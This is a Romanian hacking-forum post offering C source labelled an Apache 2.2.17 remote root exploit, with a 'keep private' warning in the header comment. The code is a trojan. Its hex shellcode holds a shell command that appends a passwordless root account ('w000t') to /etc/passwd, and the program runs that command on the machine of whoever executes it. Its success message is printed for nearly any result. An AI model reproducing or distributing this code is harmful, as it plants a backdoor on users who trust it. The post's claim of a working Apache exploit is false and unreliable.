EliteHackers
SALUT 2022!! NE-AM MUTAT PE DISCORD ! Vrei să inviți un prieten? [T]eoria [H]aosului [C]ontrolat - https://discord.com/invite/U4HBCHzm7r Acesta aste link-ul oficial al acestui server. 		Lista Forumurilor Pe Tematici
EliteHackers | Reguli | Inregistrare | Login

POZE ELITEHACKERS

Nu sunteti logat. 		Nou pe simpatie:
andreea_bianca24
Femeie
24 ani
Mures
cauta Barbat
24 - 58 ani
EliteHackers / Exploituri / Apache 2.2.17 remote root exploit Moderat de Ad_Infinitum, AntiKiler, Puscas_marin, r3v
Autor
Mesaj Pagini: 1
r3v
Moderator

Inregistrat: acum 16 ani
Postari: 1158


Code:

/* apachesm4sh.c apache 2.2.17 remote root exploit*/
/* KEEP PRIV8&!&! leak and i will find you :) ~ desg */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

char evil[] =   
         "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47\x89"
            "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51\x89"
            "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80\xe8"
            "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63\x23"
            "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30\x74"
            "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65\x3a"
            "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"
            "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
            "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44"
            "\x44\x44";

#define    NOP    0x90
#define    BSIZE    1000
#define    OFFSET    400
#define    ADDR    0xbffff658
#define ASIZE    2000

int
main(int argc, char *argv[])
{
    char *buffer;
    int s;
    struct hostent *hp;
    struct sockaddr_in sin;
    if (argc != 2) {
        printf("%s <target>\n", argv[0]);
        exit(1);
      }
    buffer = (char *) malloc(BSIZE + ASIZE + 100);
    if (buffer == NULL) {
        printf("Not enough memory\n");
        exit(1);
      }
    memcpy(&buffer[BSIZE - strlen(evil)], evil,
        strlen(evil));
    buffer[BSIZE + ASIZE] = ';';
    buffer[BSIZE + ASIZE + 1] = '\0';
    hp = gethostbyname(argv[1]);
    if (hp == NULL) {
        printf("no such server\n");
        exit(1);
      }
    bzero(&sin, sizeof(sin));
    bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(80);
    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s < 0) {
        printf("Can't open socket\n");
        exit(1);
      }
    if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
        printf("Connection refused\n");
        exit(1);
      }
    printf("sending exploit code...\n");
    if (send(s, buffer, strlen(buffer), 0) != 1)
        printf("exploit was successful!\n");
      else
        printf("sorry, this site isn't vulnerable\n");
    printf("waiting for shell.....\n");
    if (fork() == 0)
        execl("/bin/sh", "sh", "-c", evil, 0);
      else
        wait(NULL);
    while (1) { /* shell */ }
}



_______________________________________
http://thieves-team.com
r3vyk.info
mess id: doar prin PM datorita faptului ca mi-au dat add 10000 de retardati care joaca metin
pus acum 14 ani
   
Pagini: 1  

Mergi la